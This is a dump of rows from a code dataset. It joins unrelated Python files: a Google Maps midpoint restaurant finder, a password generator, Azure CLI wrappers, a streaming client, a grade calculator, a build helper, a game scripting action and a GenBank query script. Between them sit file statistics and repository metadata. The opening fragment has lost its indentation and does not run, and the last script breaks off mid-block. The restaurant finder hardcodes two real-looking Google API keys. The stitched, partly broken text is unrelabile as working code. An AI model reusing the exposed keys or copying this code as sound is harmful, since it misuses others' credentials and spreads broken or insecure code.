#This code gives users the option to restart the program or exit when finished
while restart != "X" and restart != "x":
street_address_a = input('Please enter the street address only of Person A. \nDo not include city or state: ')
city_a = input('Enter the city of Person A: ')
state_a = input('Enter the state of Person A: ')
updated_address_a = str(street_address_a) + ' ' + str(city_a) + ' ' + str(state_a)
street_address_b = input('\nPlease enter the street address only of Person B. \nDo not include city or state: ')
city_b = input('Enter the city of Person B: ')
state_b = input('Enter the state of Person B: ')
updated_address_b = str(street_address_b) + ' ' + str(city_b) + ' ' + str(state_b)
#Should add way for user to confirm the address is correct, with options to revise if there is a typo.
#Should add exception handling to confirm that the user's input is valid (e.g. not entering numbers or special characters instead of letters for city and state)
print('\nLet\'s find a restaurant at the midpoint of those locations!\nPlease wait... this may take a few moments.')
#I have gathered all the necessary information from the user, now I need to connect with the GoogleMaps Directions API
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_a, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_a = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_a = api_response_dict['results'][0]['geometry']['location']['lng']
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_b, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_b = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_b = api_response_dict['results'][0]['geometry']['location']['lng']
#Now that the latitude and longitude of both addresses has been pulled from the GoogleMaps Directions API, I am going to average them together to find a midpoint
average_latitude = find_average(latitude_a, latitude_b)
average_longitude = find_average(longitude_a, longitude_b)
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=500&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 500 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 500 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, I could not find a restaurant within 500 meters of the midpoint. \nI am now checking for a restaurant within 5000 meters.')
#This addition allows for more flexibility in suburban areas or if both addresses are not located in the same city.
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=5000&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 5000 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 5000 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, there does not appear to be a restaurant within 5000 meters of the midpoint. \nMiddle Ground is working on expanding functionality to less densely populated areas, so stay tuned for future updates!')
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
"""FUTURE IMPROVEMENTS:
- Give users the choice to input restaurant, bar, cafe, museum, or any of the other supported "types" on the Google Places API
- Return a list of establishment choices, with options to rank by distance from midpoint or Yelp rating
- Make the acceptable radius of the midpoint establishment a percentage of the total distance between locations. Users traveling longer distances may be more willing to drive an extra few miles out of the way to visit a higher-rated establishment than users who plan on only walking a few city blocks to meet their friend.
- Take into consideration whether users will be driving, walking, public transportation as that can affect commuting time
- Explore whether I can connect Middle Ground with OpenTable to allow users to make a reservation
- Some results (McDonald's, Cozi, etc), while accurate, could be disappointing to users who are looking for a more elegant dining experience. Add a way for users to receive a second restaurant result if they are not happy with the first one. In some locations, chain restaurants may make up the bulk of available establishments, so I don't want to screen them out completely."""
| 66.306569 | 378 | 0.709489 | """Goal: Create a program where users can input two locations and return a restaurant as equidistant as possible between them.
This will be done by connecting with the GoogleMaps Directions and Places API.
Once a suitable establishment has been found, the program will return the establishment's name, address, phone number, and hours of operation.
If a restaurant can not be found within 500 meters of the midpoint, Middle Ground will automatically expand the radius to 5000 meters."""
#!/usr/bin/env python3
import requests, json, pprint
#The requests and json modules allow me to access the JSON response from the Google APIs
#pprint allows me to return the data to the user in a format that is easier to read
DIRECTIONS_API_KEY = 'AIzaSyDmLGPIUErCNSmM-FPFSUGS9LIPFv9cbRI' #GoogleMaps Directions API Key
PLACES_API_KEY = 'AIzaSyDR_0dNH_A30KWnjz3s7GG7PZw6Vo3WkDQ' #Google Places API Key
#I do not expect a lot of people to be accessing this program on GitHub currently, so I feel comfortable leaving in the API Keys and am not worried about going over the request limit.
#NOTE(review): API keys committed to source control should be treated as
#compromised; prefer loading them from environment variables and rotating
#these keys.
print('Welcome to Middle Ground.\n\nPlease use the following guidelines for the best results:')
print('\n1. Make sure the addresses are spelled completely and correctly.\nAddresses are not case-sensitive and standard postal abbreviations are acceptable.')
print('\n2. Restart the program if you have made an error while typing either address.')
print('\n3. Since Middle Ground aims to find restaurants within 500 meters of the midpoint, it is best suited for use in densely populated areas.\n')
print('*****************************************************\n\n')
def find_average(input_a, input_b):
    """Return the arithmetic mean of two coordinates.

    Hoisted to module level -- the original re-defined this function on
    every pass through the main loop.
    """
    return (input_a + input_b) / 2


def _geocode(address):
    """Return (latitude, longitude) for *address*, or None if geocoding fails."""
    response = requests.get(
        'https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(
            address, DIRECTIONS_API_KEY))
    data = response.json()
    if data['status'] != 'OK':
        return None
    location = data['results'][0]['geometry']['location']
    return location['lat'], location['lng']


def _find_place_id(latitude, longitude, radius):
    """Return the place_id of the first restaurant within *radius* meters of the point, or None."""
    response = requests.get(
        'https://maps.googleapis.com/maps/api/place/radarsearch/json?location='
        + str(latitude) + ',' + str(longitude) + '&radius=' + str(radius)
        + '&type=restaurant&key=' + str(PLACES_API_KEY))
    data = response.json()
    if data['status'] != 'OK' or not data['results']:
        return None
    return data['results'][0]['place_id']


def _print_place(place_id):
    """Print name, address, phone number and opening hours for *place_id*.

    Returns True on success, False if the details lookup failed.  Phone
    number and opening hours are optional fields in the Places response, so
    a missing field no longer crashes the program (the original raised
    KeyError).
    """
    response = requests.get(
        'https://maps.googleapis.com/maps/api/place/details/json?placeid='
        + str(place_id) + '&key=' + str(PLACES_API_KEY))
    details = response.json()
    if details['status'] != 'OK':
        return False
    result = details['result']
    print('\nYou should meet at ' + result['name'])
    print(result['formatted_address'])
    print(result.get('formatted_phone_number', 'No phone number listed.'))
    #Using pprint module to print days and hours on separate lines
    pprint.pprint(result.get('opening_hours', {}).get('weekday_text', []))
    return True


restart = 1
#This loop gives users the option to restart the program or exit when finished.
while restart != "X" and restart != "x":
    street_address_a = input('Please enter the street address only of Person A. \nDo not include city or state: ')
    city_a = input('Enter the city of Person A: ')
    state_a = input('Enter the state of Person A: ')
    updated_address_a = str(street_address_a) + ' ' + str(city_a) + ' ' + str(state_a)
    street_address_b = input('\nPlease enter the street address only of Person B. \nDo not include city or state: ')
    city_b = input('Enter the city of Person B: ')
    state_b = input('Enter the state of Person B: ')
    updated_address_b = str(street_address_b) + ' ' + str(city_b) + ' ' + str(state_b)
    print('\nLet\'s find a restaurant at the midpoint of those locations!\nPlease wait... this may take a few moments.')
    coords_a = _geocode(updated_address_a)
    coords_b = _geocode(updated_address_b) if coords_a is not None else None
    if coords_a is None or coords_b is None:
        #The original silently restarted on a failed geocode; tell the user why.
        print('\nSorry, one of those addresses could not be located. Please check the spelling and try again.')
        continue
    average_latitude = find_average(coords_a[0], coords_b[0])
    average_longitude = find_average(coords_a[1], coords_b[1])
    #First try a tight 500 meter radius around the midpoint.
    place_id = _find_place_id(average_latitude, average_longitude, 500)
    if place_id is not None and _print_place(place_id):
        restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
        continue
    print('\nI\'m sorry, I could not find a restaurant within 500 meters of the midpoint. \nI am now checking for a restaurant within 5000 meters.')
    #This addition allows for more flexibility in suburban areas or if both addresses are not located in the same city.
    place_id = _find_place_id(average_latitude, average_longitude, 5000)
    if place_id is not None and _print_place(place_id):
        restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
        continue
    print('\nI\'m sorry, there does not appear to be a restaurant within 5000 meters of the midpoint. \nMiddle Ground is working on expanding functionality to less densely populated areas, so stay tuned for future updates!')
    restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
"""FUTURE IMPROVEMENTS:
- Give users the choice to input restaurant, bar, cafe, museum, or any of the other supported "types" on the Google Places API
- Return a list of establishment choices, with options to rank by distance from midpoint or Yelp rating
- Make the acceptable radius of the midpoint establishment a percentage of the total distance between locations. Users traveling longer distances may be more willing to drive an extra few miles out of the way to visit a higher-rated establishment than users who plan on only walking a few city blocks to meet their friend.
- Take into consideration whether users will be driving, walking, public transportation as that can affect commuting time
- Explore whether I can connect Middle Ground with OpenTable to allow users to make a reservation
- Some results (McDonald's, Cozi, etc), while accurate, could be disappointing to users who are looking for a more elegant dining experience. Add a way for users to receive a second restaurant result if they are not happy with the first one. In some locations, chain restaurants may make up the bulk of available establishments, so I don't want to screen them out completely."""
| 52 | 0 | 27 |
bd7345779b149c54a9813c23deec41c488f2c462 | 619 | py | Python | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | secpassgen.py | Boostonthebrain/securePasswordGenerator | 24b230c17d39ca986723947f8665e615f24b35b4 | [
"MIT"
] | null | null | null | #secure password generator
#written by boostOnTheBrain
#Fixed: a generator named "secure" was drawing characters from the `random`
#module, which is NOT cryptographically secure; `secrets` is the stdlib
#module intended for passwords and tokens.
import secrets

#Candidate pool: ASCII letters, digits, and a punctuation subset.
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*-=+_?"

def make_password(length):
    """Return a password of *length* characters drawn with a CSPRNG."""
    return ''.join(secrets.choice(characters) for _ in range(length))

#Prompt for and print three passwords in a row, as the original script did
#with three copy-pasted loops.
for _ in range(3):
    length = int(input('password length?'))
    print(make_password(length))
input("PRESS ENTER TO EXIT") | 24.76 | 91 | 0.712439 | #secure password generator
#written by boostOnTheBrain
import random
#NOTE(review): despite the "secure" name this uses the `random` module,
#which is not cryptographically secure; the stdlib `secrets` module is the
#appropriate choice for passwords.
#Candidate pool: ASCII letters, digits, and a punctuation subset.
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*-=+_?"
#Password 1: read the desired length, then append one random character at a time.
length = int(input('password length?'))
password = ''
for c in range(length):
    password += random.choice(characters)
print(password)
#Password 2: same procedure, repeated verbatim.
length = int(input('password length?'))
password = ''
for c in range(length):
    password += random.choice(characters)
print(password)
#Password 3: same procedure, repeated verbatim.
length = int(input('password length?'))
password = ''
for c in range(length):
    password += random.choice(characters)
print(password)
input("PRESS ENTER TO EXIT") | 0 | 0 | 0 |
70ac3a1bfd8d090df7560b741d9c9e80e5abdaa1 | 3,469 | py | Python | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | null | null | null | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | 9 | 2021-09-24T16:37:24.000Z | 2021-12-24T00:39:19.000Z | test/pyaz/network/application_gateway/rewrite_rule/condition/__init__.py | bigdatamoore/py-az-cli | 54383a4ee7cc77556f6183e74e992eec95b28e01 | [
"MIT"
] | null | null | null | import json, subprocess
from ..... pyaz_utils import get_cli_name, get_params
| 39.420455 | 188 | 0.688671 | import json, subprocess
from ..... pyaz_utils import get_cli_name, get_params
def create(resource_group, gateway_name, rule_set_name, rule_name, variable, pattern=None, ignore_case=None, negate=None, no_wait=None):
    """Run ``az network application-gateway rewrite-rule condition create``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition create " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # The print() calls that followed `return`/`raise` here were
        # unreachable dead code and have been removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def show(resource_group, gateway_name, rule_set_name, rule_name, variable):
    """Run ``az network application-gateway rewrite-rule condition show``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition show " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Dead `print()` statements after return/raise removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def list(resource_group, gateway_name, rule_set_name, rule_name):
    """Run ``az network application-gateway rewrite-rule condition list``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.

    NOTE: the name shadows the builtin ``list``; kept for interface
    compatibility with existing callers.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition list " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Dead `print()` statements after return/raise removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def delete(resource_group, gateway_name, rule_set_name, rule_name, variable, no_wait=None):
    """Run ``az network application-gateway rewrite-rule condition delete``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition delete " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Dead `print()` statements after return/raise removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def update(resource_group, gateway_name, rule_set_name, rule_name, variable, pattern=None, ignore_case=None, negate=None, set=None, add=None, remove=None, force_string=None, no_wait=None):
    """Run ``az network application-gateway rewrite-rule condition update``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.

    NOTE: the ``set`` parameter shadows the builtin; kept because callers
    pass it by keyword to mirror the az CLI's ``--set`` option.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition update " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Dead `print()` statements after return/raise removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def list_server_variables():
    """Run ``az network application-gateway rewrite-rule condition list-server-variables``.

    Returns the CLI's JSON output parsed into Python objects; raises
    Exception carrying stderr when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az network application-gateway rewrite-rule condition list-server-variables " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Dead `print()` statements after return/raise removed.
        return json.loads(stdout)
    else:
        raise Exception(stderr)
| 3,240 | 0 | 150 |
be83192f6c91989b488f2039a459419f2fad99a0 | 1,423 | py | Python | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 50 | 2015-02-03T21:48:33.000Z | 2021-09-26T22:50:52.000Z | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 13 | 2017-01-18T13:47:41.000Z | 2020-06-22T23:34:17.000Z | python-client/src/gabriel_client/push_source.py | cmusatyalab/gabriel | 5761fa61d7fa1a17b4af1a9b4dd5faca8ffe6c3c | [
"Apache-2.0"
] | 33 | 2015-05-30T21:30:29.000Z | 2021-09-26T23:14:41.000Z | import asyncio
import multiprocessing
from gabriel_protocol import gabriel_pb2
from gabriel_client.websocket_client import ProducerWrapper
| 32.340909 | 80 | 0.673226 | import asyncio
import multiprocessing
from gabriel_protocol import gabriel_pb2
from gabriel_client.websocket_client import ProducerWrapper
def consumer(_):
pass
class Source:
def __init__(self, source_name):
self._source_name = source_name
self._frame_available = asyncio.Event()
self._latest_input_frame = None
self._read, self._write = multiprocessing.Pipe(duplex=False)
self._added_callback = False
def get_producer_wrapper(self):
def reader_callback():
input_frame = gabriel_pb2.InputFrame()
input_frame.ParseFromString(self._read.recv_bytes())
self._latest_input_frame = input_frame
self._frame_available.set()
async def producer():
if not self._added_callback:
# We need this to be run on the event loop running the producer
fd = self._read.fileno()
asyncio.get_event_loop().add_reader(fd, reader_callback)
self._added_callback = True
await self._frame_available.wait()
# Clear because we are sending self._latest_input_frame
self._frame_available.clear()
return self._latest_input_frame
return ProducerWrapper(producer=producer, source_name=self._source_name)
def send(self, input_frame):
self._write.send_bytes(input_frame.SerializeToString())
| 1,164 | -8 | 126 |
ddd0fec714f1055c9950ed597a56150c4a0904eb | 464 | py | Python | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null | define_conceito.py | VGloria23/Curso_PPT | 8468103e877101f03e2b808415cb55b7688661ed | [
"MIT"
] | null | null | null |
nota = float(input('Insira a pontuação: '))
computar_notas(nota) | 25.777778 | 45 | 0.403017 | def computar_notas(n):
try:
if n >= 0.9 and n <= 1:
nota = 'A'
elif n >= 0.8 and n < 0.9:
nota = 'B'
elif n >= 0.7 and n < 0.8:
nota = 'C'
elif n >= 0.6 and n < 0.7:
nota = 'D'
elif n < 0.6:
nota = 'F'
print(nota)
except:
print('Pontuação inválida')
nota = float(input('Insira a pontuação: '))
computar_notas(nota) | 369 | 0 | 23 |
25bd6b60e62fd7b594d426106c9549541e986267 | 324 | py | Python | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 1 | 2019-10-06T12:00:41.000Z | 2019-10-06T12:00:41.000Z | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 14 | 2019-10-06T12:31:11.000Z | 2019-10-16T08:05:33.000Z | src/builder.py | majkrzak/kot | 1ef7ee448d460bb46613c8400743b7c4185a2ed2 | [
"MIT"
] | 4 | 2019-10-06T12:41:18.000Z | 2019-10-08T01:57:21.000Z | from subprocess import run
| 21.6 | 118 | 0.509259 | from subprocess import run
class Builder:
    """Compiles Kotlin modules into ``dir`` by shelling out to ``kotlinc``."""
    # Output directory for the compiled classes.
    dir: str
    def __init__(self, dir):
        # NOTE: the parameter shadows the builtin `dir`; kept for
        # interface compatibility with existing callers.
        self.dir = dir
    def __call__(self, modules):
        # Builds the classpath from every jar under .lib with a shell
        # pipeline (find | xargs | sed), then compiles the given modules.
        # NOTE(review): `modules` and `self.dir` are interpolated into a
        # shell=True command without quoting -- unsafe if they can contain
        # spaces or shell metacharacters; confirm inputs are trusted.
        run(f'''kotlinc {' '.join(modules)} -cp $(find .lib -name "*.jar" | xargs | sed 's/ /:/g') -d {self.dir}/''',
            shell=True,
            check=True
        )
| 213 | 60 | 23 |
c4d354a7574e9815edb9e4f5717088c3fb0524a6 | 4,145 | py | Python | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/scripting/actions/affecter.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
# Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action affecter."""
from primaires.format.fonctions import supprimer_accents
from primaires.perso.exceptions.action import ExceptionAction
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Donne une affection à un personnage ou une salle."""
@classmethod
@staticmethod
def affecter_personnage(personnage, affection, duree, force):
"""Donne l'affection au personnage.
Les paramètres à préciser sont :
* personnage : le personnage à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si le personnage est déjà affecté par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("personnage", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
personnage.affecte(cle, int(duree), int(force))
@staticmethod
def affecter_salle(salle, affection, duree, force):
"""Donne l'affection à la salle.
Les paramètres à préciser sont :
* salle : la salle à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si la salle est déjà affectée par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("salle", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
salle.affecte(cle, int(duree), int(force))
| 39.103774 | 79 | 0.691194 | # -*-coding:Utf-8 -*
# Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action affecter."""
from primaires.format.fonctions import supprimer_accents
from primaires.perso.exceptions.action import ExceptionAction
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Donne une affection à un personnage ou une salle."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.affecter_personnage, "Personnage",
"str", "Fraction", "Fraction")
cls.ajouter_types(cls.affecter_salle, "Salle",
"str", "Fraction", "Fraction")
@staticmethod
def affecter_personnage(personnage, affection, duree, force):
"""Donne l'affection au personnage.
Les paramètres à préciser sont :
* personnage : le personnage à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si le personnage est déjà affecté par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("personnage", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
personnage.affecte(cle, int(duree), int(force))
@staticmethod
def affecter_salle(salle, affection, duree, force):
"""Donne l'affection à la salle.
Les paramètres à préciser sont :
* salle : la salle à affecter
* affection : la clé de l'affection sous la forme d'une chaîne
* duree : la durée de l'affection
* force : la force de l'affection
Si la salle est déjà affectée par la même affection, les
nouvelles valeurs sont modulées (le résultat final dépend de
l'affection choisie).
Généralement, la durée et la force sont ajoutées aux anciennes
valeurs.
"""
# Essaye de trouver l'affection
cle = affection.lower()
try:
affection = importeur.affection.get_affection("salle", cle)
except KeyError:
raise ErreurExecution("l'affection {} n'existe pas".format(repr(
cle)))
salle.affecte(cle, int(duree), int(force))
| 213 | 0 | 26 |
19ac1f0595ce9589ef22aa484301b0725803e2b1 | 2,030 | py | Python | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | 3 | 2018-05-04T02:17:30.000Z | 2019-01-09T18:47:12.000Z | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | null | null | null | GenBankTools/Check_for_species_in_GenBank.py | magitz/ToolBox | 201d6e5aced576f057820c86276b27b0f90be381 | [
"MIT"
] | 4 | 2015-09-21T18:58:03.000Z | 2018-05-04T02:17:37.000Z | #!/usr/bin/env python
from Bio import Entrez
import os
import argparse
import time
# =====================================================
# Takes a list of species names and queries GenBank for
# that species. If any data are in GenBank, a file is
# written that has the GenBank IDs for that species.
#
# Matt Gitzendanner
# University of Florida
# 3/07/16
#
# =====================================================
#####################
# Options
#
# -i input file with list of species.
# -e email address used for Entrez
# -o Output folder
#####################
parser = argparse.ArgumentParser()
parser.add_argument("-i", help="input file with GenBank accession IDs")
parser.add_argument("-e", help="email address")
parser.add_argument("-o", help="output folder name")
args = parser.parse_args()
infile = args.i
Entrez.email = args.e #sets the email for Entrez.
OutputFolder= args.o
#Function to test for non-zero file size.
try:
IN=open(infile, 'r')
except IOError:
print "Can't open file", infile
for Line in IN:
Line=Line.strip('\n')
Organism= Line + "[Orgn]"
OutFile=os.path.join(OutputFolder, Line.replace(" ", "_"))
#Check if we've already done this species--look for non-zero output file.
#This allows rerunning to catch failed runs without redoing all.
if is_non_zero_file(OutFile):
pass
else:
for i in range(3, 0, -1):
try:
GBSeq = Entrez.esearch(db="nucleotide", term=Organism ) #Get the sequence
except:
